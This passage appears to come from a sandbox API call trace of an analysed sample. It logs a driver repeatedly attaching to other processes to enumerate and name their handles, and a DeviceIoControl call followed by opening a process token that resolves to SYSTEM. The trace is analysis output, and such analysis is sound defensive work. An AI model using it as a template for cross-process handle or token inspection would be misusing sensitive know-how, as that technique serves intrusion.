(in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.927] ObfDereferenceObject (Object=0xffffe00073222f20) returned 0x8017 [0289.927] IoCompleteRequest () returned 0x0 [0289.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.927] PsAcquireProcessExitSynchronization () returned 0x0 [0289.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.927] ObReferenceObjectByHandle (in: Handle=0x81c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000788b54f0, HandleInformation=0x0) returned 0x0 [0289.927] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.927] PsReleaseProcessExitSynchronization () returned 0x2 [0289.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffae [0289.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.927] ObfDereferenceObject (Object=0xffffe000788b54f0) returned 0x800e [0289.927] IoCompleteRequest () returned 0x0 [0289.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.927] PsAcquireProcessExitSynchronization () returned 0x0 [0289.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.927] ObReferenceObjectByHandle (in: Handle=0x820, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4a28a0, HandleInformation=0x0) returned 0x0 [0289.927] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.927] PsReleaseProcessExitSynchronization () returned 0x2 [0289.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffad [0289.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.927] ObfDereferenceObject (Object=0xffffe0006a4a28a0) returned 0x800e [0289.927] IoCompleteRequest () returned 0x0 [0289.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.927] PsAcquireProcessExitSynchronization () returned 0x0 [0289.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.927] ObReferenceObjectByHandle (in: Handle=0x87c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0c8f20, HandleInformation=0x0) returned 0x0 [0289.927] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.927] PsReleaseProcessExitSynchronization () returned 0x2 [0289.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffac [0289.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.927] ObfDereferenceObject (Object=0xffffe0006a0c8f20) returned 0x7ffb [0289.928] IoCompleteRequest () returned 0x0 [0289.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.928] PsAcquireProcessExitSynchronization () returned 0x0 [0289.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.928] ObReferenceObjectByHandle (in: Handle=0x88c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a06bc30, HandleInformation=0x0) returned 0x0 [0289.928] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.928] PsReleaseProcessExitSynchronization () returned 0x2 [0289.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffab [0289.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.928] ObfDereferenceObject (Object=0xffffe0006a06bc30) returned 0x800e [0289.928] IoCompleteRequest () returned 0x0 [0289.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.928] PsAcquireProcessExitSynchronization () returned 0x0 [0289.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.928] ObReferenceObjectByHandle (in: Handle=0x890, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a650930, HandleInformation=0x0) returned 0x0 [0289.928] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.928] PsReleaseProcessExitSynchronization () returned 0x2 [0289.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffaa [0289.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.928] ObfDereferenceObject (Object=0xffffe0006a650930) returned 0x8004 [0289.928] IoCompleteRequest () returned 0x0 [0289.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.928] PsAcquireProcessExitSynchronization () returned 0x0 [0289.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.928] ObReferenceObjectByHandle (in: Handle=0x8a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4d1a30, HandleInformation=0x0) returned 0x0 [0289.928] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.928] PsReleaseProcessExitSynchronization () returned 0x2 [0289.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa9 [0289.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.928] ObfDereferenceObject (Object=0xffffe0006a4d1a30) returned 0x7ffe [0289.928] IoCompleteRequest () returned 0x0 [0289.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.928] PsAcquireProcessExitSynchronization () returned 0x0 [0289.928] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.928] ObReferenceObjectByHandle (in: Handle=0x8b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a720090, HandleInformation=0x0) returned 0x0 [0289.928] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.928] PsReleaseProcessExitSynchronization () returned 0x2 [0289.928] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa8 [0289.928] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.928] ObfDereferenceObject (Object=0xffffe0006a720090) returned 0x7ffd [0289.928] IoCompleteRequest () returned 0x0 [0289.928] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.928] PsAcquireProcessExitSynchronization () returned 0x0 [0289.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.929] ObReferenceObjectByHandle (in: Handle=0x8cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a24c70, HandleInformation=0x0) returned 0x0 [0289.929] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.929] PsReleaseProcessExitSynchronization () returned 0x2 [0289.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa7 [0289.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.929] ObfDereferenceObject (Object=0xffffe00069a24c70) returned 0x8005 [0289.929] IoCompleteRequest () returned 0x0 [0289.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.929] PsAcquireProcessExitSynchronization () returned 0x0 [0289.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.929] ObReferenceObjectByHandle (in: Handle=0x8dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6fd580, HandleInformation=0x0) returned 0x0 [0289.929] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.929] PsReleaseProcessExitSynchronization () returned 0x2 [0289.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa6 [0289.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.929] ObfDereferenceObject (Object=0xffffe0006a6fd580) returned 0x8005 [0289.929] IoCompleteRequest () returned 0x0 [0289.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.929] PsAcquireProcessExitSynchronization () returned 0x0 [0289.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.929] ObReferenceObjectByHandle (in: Handle=0x8f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a730c00, HandleInformation=0x0) returned 0x0 [0289.929] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.929] PsReleaseProcessExitSynchronization () returned 0x2 [0289.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa5 [0289.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.929] ObfDereferenceObject (Object=0xffffe0006a730c00) returned 0x8005 [0289.929] IoCompleteRequest () returned 0x0 [0289.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.929] PsAcquireProcessExitSynchronization () returned 0x0 [0289.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.929] ObReferenceObjectByHandle (in: Handle=0x908, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a731090, HandleInformation=0x0) returned 0x0 [0289.929] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.929] PsReleaseProcessExitSynchronization () returned 0x2 [0289.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa4 [0289.929] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.929] ObfDereferenceObject (Object=0xffffe0006a731090) returned 0x8005 [0289.929] IoCompleteRequest () returned 0x0 [0289.929] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.929] PsAcquireProcessExitSynchronization () returned 0x0 [0289.929] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.929] ObReferenceObjectByHandle (in: Handle=0x918, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a077f20, HandleInformation=0x0) returned 0x0 [0289.929] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.929] PsReleaseProcessExitSynchronization () returned 0x2 [0289.929] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa3 [0289.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.930] ObfDereferenceObject (Object=0xffffe0006a077f20) returned 0x8005 [0289.930] IoCompleteRequest () returned 0x0 [0289.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.930] PsAcquireProcessExitSynchronization () returned 0x0 [0289.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.930] ObReferenceObjectByHandle (in: Handle=0x928, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fd1a30, HandleInformation=0x0) returned 0x0 [0289.930] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.930] PsReleaseProcessExitSynchronization () returned 0x2 [0289.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa2 [0289.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.930] ObfDereferenceObject (Object=0xffffe00069fd1a30) returned 0x8005 [0289.930] IoCompleteRequest () returned 0x0 [0289.930] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.930] PsAcquireProcessExitSynchronization () returned 0x0 [0289.930] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.930] ObReferenceObjectByHandle (in: Handle=0x944, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a50d8c0, HandleInformation=0x0) returned 0x0 [0289.930] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.930] PsReleaseProcessExitSynchronization () returned 0x2 [0289.930] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffa1 [0289.930] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.930] ObfDereferenceObject (Object=0xffffe0006a50d8c0) returned 0x800a [0289.930] IoCompleteRequest () returned 0x0 [0289.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x188 [0289.930] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.930] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006985a840, HandleInformation=0x0) returned 0x0 [0289.930] ObOpenObjectByPointer (in: Object=0xffffe0006985a840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.930] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x4ffea [0289.930] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.930] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.930] IoCompleteRequest () returned 0x0 [0289.930] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.930] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.931] CloseHandle (hObject=0x18c) returned 1 [0289.931] CloseHandle (hObject=0x188) returned 1 [0289.931] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.931] PsAcquireProcessExitSynchronization () returned 0x0 [0289.931] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.932] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069858d30, HandleInformation=0x0) returned 0x0 [0289.932] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.932] PsReleaseProcessExitSynchronization () returned 0x2 [0289.932] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe8 [0289.932] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.932] ObfDereferenceObject (Object=0xffffe00069858d30) returned 0x7ffe [0289.932] IoCompleteRequest () returned 0x0 [0289.932] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.932] PsAcquireProcessExitSynchronization () returned 0x0 [0289.932] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.932] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006985d2c0, HandleInformation=0x0) returned 0x0 [0289.932] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.932] PsReleaseProcessExitSynchronization () returned 0x2 [0289.932] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe7 [0289.932] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.932] ObfDereferenceObject (Object=0xffffe0006985d2c0) returned 0x7ffb [0289.932] IoCompleteRequest () returned 0x0 [0289.932] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.932] PsAcquireProcessExitSynchronization () returned 0x0 [0289.932] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.932] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069855090, HandleInformation=0x0) returned 0x0 [0289.932] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.932] PsReleaseProcessExitSynchronization () returned 0x2 [0289.932] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe6 [0289.932] ObQueryNameString (in: Object=0xffffe00069855090, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.932] ObfDereferenceObject (Object=0xffffe00069855090) returned 0x7ffe [0289.932] IoCompleteRequest () returned 0x0 [0289.932] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.932] PsAcquireProcessExitSynchronization () returned 0x0 [0289.932] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.932] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698777d0, HandleInformation=0x0) returned 0x0 [0289.932] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.932] PsReleaseProcessExitSynchronization () returned 0x2 [0289.932] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe5 [0289.932] ObQueryNameString (in: Object=0xffffe000698777d0, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.932] ObfDereferenceObject (Object=0xffffe000698777d0) returned 0x7ee4 [0289.932] IoCompleteRequest () returned 0x0 [0289.932] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.932] PsAcquireProcessExitSynchronization () returned 0x0 [0289.932] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.932] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698cea10, HandleInformation=0x0) returned 0x0 [0289.932] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.933] PsReleaseProcessExitSynchronization () returned 0x2 [0289.933] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe4 [0289.933] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.933] ObfDereferenceObject (Object=0xffffe000698cea10) returned 0x7ffd [0289.933] IoCompleteRequest () returned 0x0 [0289.933] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.933] PsAcquireProcessExitSynchronization () returned 0x0 [0289.933] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.933] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698d4390, HandleInformation=0x0) returned 0x0 [0289.933] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.933] PsReleaseProcessExitSynchronization () returned 0x2 [0289.933] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe3 [0289.933] ObQueryNameString (in: Object=0xffffe000698d4390, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.933] ObfDereferenceObject (Object=0xffffe000698d4390) returned 0x7ffe [0289.933] IoCompleteRequest () returned 0x0 [0289.933] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.933] PsAcquireProcessExitSynchronization () returned 0x0 [0289.933] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400) [0289.933] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698ce2f0, HandleInformation=0x0) returned 0x0 [0289.933] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.933] PsReleaseProcessExitSynchronization () returned 0x2 [0289.933] ObfDereferenceObject (Object=0xffffe0006985a840) returned 0x47fe2 [0289.933] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.933] ObfDereferenceObject (Object=0xffffe000698ce2f0) returned 0x7fca [0289.933] IoCompleteRequest () returned 0x0 [0289.933] PsLookupProcessByProcessId (in: ProcessId=0x358, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.933] PsAcquireProcessExitSynchronization () returned 0x0 [0289.933] KeStackAttachProcess (in: PROCESS=0xffffe0006985a840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006985a840, 